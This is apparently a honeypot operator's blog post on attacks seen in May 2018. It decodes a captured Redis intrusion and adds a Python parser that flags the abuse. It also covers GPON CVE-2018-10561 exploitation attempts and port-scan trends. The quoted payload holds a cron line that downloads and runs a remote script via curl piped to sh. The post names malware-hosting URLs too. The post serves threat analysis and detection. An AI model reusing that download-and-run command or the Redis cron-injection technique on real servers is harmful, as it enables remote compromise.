It’s strange how attacks seem to move around on a weekly/monthly basis. Up until recently I saw a number of attacks against GPON, and today I don’t see a single one. Some of this is just probability: I occupy only a small amount of IP space, so with a given number of attackers throwing a given number of attacks per second, only some portion of the IP space, less than 100%, will be hit.
This morning on TCP 6379 I received an offer my computer, fortunately, refused:

    2a310d0a24370d0a434f4d4d414e440d  *1..$7..COMMAND.
    0a2a340d0a24360d0a636f6e6669670d  .*4..$6..config.
    0a24330d0a7365740d0a2431300d0a64  .$3..set..$10..d
    6266696c656e616d650d0a24390d0a62  bfilename..$9..b
    61636b75702e64620d0a2a310d0a2434  ackup.db..*1..$4
    0d0a736176650d0a2a310d0a24380d0a  ..save..*1..$8..
    666c757368616c6c0d0a2a330d0a2433  flushall..*3..$3
    0d0a7365740d0a24370d0a74726f6a61  ..set..$7..troja
    6e310d0a2436340d0a0a2a2f31202a20  n1..$64...*/1 *
    2a202a202a206375726c202d6673534c  * * * curl -fsSL
    20687474703a2f2f6368726f6d652e7a   http://chrome.z
    6572306461792e72753a353035302f6d  er0day.ru:5050/m
    727831207c2073680a0d0a            rx1 | sh...

Forget everything you know! Trojan time. The download link provided a shell script, which used both yum and apt-get to install a variety of dependencies, added an authorized ssh key to root, and dropped external connections to port 6379 via iptables (Bold move!
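To show what that capture actually asks Redis to do, here is a small RESP decoder run over the bytes above, as an added example that is not code from the original post: it re-joins the hexdump, splits it into the individual commands, and describes the ones that make up the unauthenticated-Redis write-abuse pattern a honeypot operator would alert on. The function and variable names are my own.

```python
import re

# Constructed input: the honeypot capture quoted above, re-joined from the hexdump.
CAPTURE = bytes.fromhex(
    "2a310d0a24370d0a434f4d4d414e440d0a2a340d0a24360d0a636f6e6669670d"
    "0a24330d0a7365740d0a2431300d0a646266696c656e616d650d0a24390d0a62"
    "61636b75702e64620d0a2a310d0a24340d0a736176650d0a2a310d0a24380d0a"
    "666c757368616c6c0d0a2a330d0a24330d0a7365740d0a24370d0a74726f6a61"
    "6e310d0a2436340d0a0a2a2f31202a202a202a202a206375726c202d6673534c"
    "20687474703a2f2f6368726f6d652e7a6572306461792e72753a353035302f6d"
    "727831207c2073680a0d0a"
)

def parse_resp(data: bytes):
    """Split a client-to-server RESP stream into commands (lists of str arguments)."""
    commands, pos = [], 0
    while pos < len(data):
        if data[pos:pos + 1] != b"*":
            raise ValueError(f"expected array header at offset {pos}")
        end = data.index(b"\r\n", pos)
        count, pos = int(data[pos + 1:end]), end + 2
        args = []
        for _ in range(count):
            if data[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = data.index(b"\r\n", pos)
            length, pos = int(data[pos + 1:end]), end + 2
            args.append(data[pos:pos + length].decode("latin-1"))
            pos += length + 2  # skip the payload and its trailing CRLF
        commands.append(args)
    return commands

# A crontab line ("*/N * * * * ...") whose command pipes something into sh.
CRON_PIPE_TO_SH = re.compile(r"\*/\d+( \*){4}.*\|\s*sh\b")

def flag_abuse(commands):
    """Describe the commands that make up the unauthenticated-Redis write-abuse pattern."""
    findings = []
    for args in commands:
        if not args:
            continue
        name = [a.lower() for a in args]
        if name[:2] == ["config", "set"] and len(args) == 4 and name[2] in ("dir", "dbfilename"):
            findings.append(f"CONFIG SET {name[2]}={args[3]}: redirects where the dump file is written")
        elif name[0] == "save":
            findings.append("SAVE: forces the dump to disk")
        elif name[0] == "flushall":
            findings.append("FLUSHALL: wipes every key on the server")
        elif name[0] == "set" and len(args) == 3 and CRON_PIPE_TO_SH.search(args[2]):
            findings.append(f"SET {args[1]}: value is a cron line piping a download into sh")
    return findings
```

Running `flag_abuse(parse_resp(CAPTURE))` yields four findings; the leading COMMAND is benign and is not flagged.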
Here’s a guy who is pretty bold with his malware. The page at hxxp://188.8.131.52/ reads:

    <font size='12'> <center> IM HERE TO HACK UR BOTNET </center> </font>
    <font size='12'> <center> if ur a security researcher, follow my twitter @decayable, ill glady anwser any questions </center> </font>

He shows up in my honeypot trying to use the GPON vulnerability to drop hxxp://184.108.40.206/w, which then tries to execute Mirai offshoot Okane on a variety of architectures.
I’ve edited this post over time, primarily trying to determine where the most common attacks are hitting. This will guide more focused analysis of the spots attackers are targeting.

Most popular ports, 15 May 18:

    69 - tftp
    445 - smb
    8545 - not in /etc/services - maybe misconfigured ethereum client search
    3389 - remote desktop
    2323 - telnet alternative maybe
    5555 - “personal-agent” - maybe just easy to type
    5060 - sip - voip
    6379 - maybe redis

On 16 May 18, same ports largely, but also:
In Glastopf logs I see POST requests to /GponForm/diag_Form?images/. These exploitation attempts started in the last couple of weeks, and their intensity ebbs and flows. The attacks are related to CVE-2018-10561, a router vulnerability disclosed on 3 May, and the attempts I’ve seen in the last couple of days seem the most sophisticated. Earlier attacks seemed focused on determining whether the vulnerability was present and dropping further attack code such as the Mirai binaries.